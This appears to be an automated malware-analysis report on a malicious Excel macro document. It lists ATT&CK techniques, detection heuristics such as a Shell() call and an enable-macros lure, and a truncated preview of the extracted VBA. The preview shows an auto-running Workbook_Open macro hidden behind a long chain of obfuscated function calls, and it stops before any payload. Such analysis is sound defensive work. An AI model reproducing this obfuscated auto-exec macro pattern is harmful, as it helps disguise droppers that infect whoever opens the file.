Verdict: MALICIOUS
Risk Score: 248
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
- T1059 Command and Scripting Interpreter
- T1203 Exploitation for Client Execution
The sample is an Excel document whose Workbook_Open VBA macro runs automatically when the workbook is opened and executes a Shell() command. The document also displays a fake error message instructing the user to enable macros, a lure intended to get past Office macro security settings. The ClamAV detection name indicates this is a known malware variant.
Heuristics (7)
- ClamAV: Xls.Malware.Valyria-10036514-0 (critical) [CLAMAV_DETECTION]: ClamAV detected this file as malware: Xls.Malware.Valyria-10036514-0
- VBA macros detected (medium; 4 related findings) [OLE_VBA_MACROS]: Document contains VBA macro code
- Shell() call in VBA (critical) [OLE_VBA_SHELL]: Shell() call in VBA
- Workbook_Open macro (high) [OLE_VBA_WBOPEN]: Workbook_Open macro
- VBA p-code auto-exec with execution tokens (high) [OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only macro documents, or documents whose source extraction failed, where the visible source is unavailable.
- Environ() call (env variable access) (low) [OLE_VBA_ENVIRON]: Environ() call (env variable access)
- Macro/content-enable lure (medium) [SE_ENABLE_LURE]: Document instructs the user to enable macros or editing, a common technique used by malware droppers to bypass Office macro security settings
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 110056 bytes | 1c9b72ffc6da7e5579f8d1d32dee4cf04a71c965b5095307311829c2347e2cef |

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "Version"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Version1"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
Public Sub WorKbOoK_Open(): Call DCWqlpYIhUjmZTd: End Sub
Sub DCWqlpYIhUjmZTd()
Call zIfSztfIWPVtIjm
End Sub
Private Sub zIfSztfIWPVtIjm()
Call jfpsZJZnzGRQPgw
End Sub
Static Sub jfpsZJZnzGRQPgw()
Call NnmPRfXsyBRxemt
End Sub
Static Sub NnmPRfXsyBRxemt()
Call SsbUqajqIwXrXHj
End Sub
Static Sub SsbUqajqIwXrXHj()
Call sYWDqAulvmpCLTd
End Sub
Static Function sYWDqAulvmpCLTd() As Currency
Call czPqdRHtwuoMKOY
End Function
Sub czPqdRHtwuoMKOY()
Call WNpFdXkIQoPvkxy
End Sub
Function WNpFdXkIQoPvkxy() As Currency
Call rXGBKCdPuiwpoxP
End Function
Private Function rXGBKCdPuiwpoxP()
Call UnULnZwiYblyuWd
End Function
Static Function UnULnZwiYblyuWd()
Call XAZCyWeuMUfTfLi
End Function
Static Function XAZCyWeuMUfTfLi() As String
Call UySsbZQhVQczXIb
End Function
Function UySsbZQhVQczXIb() As Object
Call GNMePnpxUJkvnmV
End Function
Private Sub GNMePnpxUJkvnmV()
Call zjCgAuoaSBAEEpL
End Sub
Private Sub zjCgAuoaSBAEEpL()
Call TAjOSaCwbuVaAIs
End Sub
Sub TAjOSaCwbuVaAIs()
Call QxigeiTRQIAKcIA
End Sub
Function QxigeiTRQIAKcIA() As Object
Call SREKZgXrjAjGERW
End Function
Private Function SREKZgXrjAjGERW() As Currency
Call OXNmokesXvVNnhf
End Function
Private Function OXNmokesXvVNnhf() As Double
Call yuXMNAYXBmSkuep
End Function
Static Function yuXMNAYXBmSkuep() As Date
Call cDUjFWWcAhSRJkn
End Function
Static Function cDUjFWWcAhSRJkn() As Long
Call hHKofRiaJcXLCGc
End Function
Private Sub hHKofRiaJcXLCGc()
Call tTvHBFWjSVkTwAN
End Sub
Static Function tTvHBFWjSVkTwAN() As Object
Call uvhXiEwYRMIqPcz
End Function
Static Function uvhXiEwYRMIqPcz() As Byte
Call oJHmhKZmkGjYpLZ
End Function
Private Function oJHmhKZmkGjYpLZ() As Object
Call JTYiOoSuOAQTtLq
End Function
Private Function JTYiOoSuOAQTtLq() As Double
Call mjmssMlNstFczkE
End Function
Private Sub mjmssMlNstFczkE()
Call pwrjCITZgmzxkZJ
End Sub
Function pwrjCITZgmzxkZJ() As Boolean
Call mukZfLFLqiwdcWC
End Function
Function mukZfLFLqiwdcWC() As Long
Call YJeMUadcobEZsAw
End Function
Private Sub YJeMUadcobEZsAw()
Call OykAplnKUiAYjnE
End Sub
Sub OykAplnKUiAYjnE()
Call iQSiHRBfdaWueGl
End Sub
Function iQSiHRBfdaWueGl() As Single
Call vTnPsETbHVubiiH
End Function
Private Function vTnPsETbHVubiiH() As Integer
Call xnIsoBXBbOdXJqc
End Function
Private Function xnIsoBXBbOdXJqc() As Currency
Call ttSVCGeCPIPesGm
End Function
Static Function ttSVCGeCPIPesGm() As Double
Call dQcucVYhtAMAzEv
End Function
Function dQcucVYhtAMAzEv() As Date
Call HZZSUsWmruMiOJt
End Function
Private Sub HZZSUsWmruMiOJt()
Call MeOWtnjkBpRcHfi
End Sub
Static Sub MeOWtnjkBpRcHfi()
Call YpzpPbWtKjfkCZU
End Sub
Function YpzpPbWtKjfkCZU() As Object
Call ZRmGwawiIaCHUBF
End Function
Private Function ZRmGwawiIaCHUBF() As Date
Call TfLVwfZwcTdpulf
End Function
Private Sub TfLVwfZwcTdpulf()
Call opdQdKSEGNKkzlw
End Sub
Static Function opdQdKSEGNKkzlw() As Double
Call RFqbGilXkGzsFJK
End Function
Function RFqbGilXkGzsFJK() As Double
Call USwSQeTjYAtNpyQ
End Function
Function USwSQeTjYAtNpyQ() As Boolean
Call RQpHuhFVhwquhvJ
End Function
Private Function RQpHuhFVhwquhvJ() As Long
Call NYlicjzWkzFSYVA
End Function
Static Function NYlicjzWkzFSYVA() As Double
Call GubjNqyzjrUbpYp
End Function
Static Sub GubjNqyzjrUbpYp()
Call MrABBkpjNnlvraO
End Sub
Static Sub MrABBkpjNnlvraO()
Call nPeyQJeQWfOeoSs
End Sub
Private Sub nPeyQJeQWfOeoSs()
Call pkAcMHiqpXxaPbO
End Sub
Static Sub pk
... (truncated)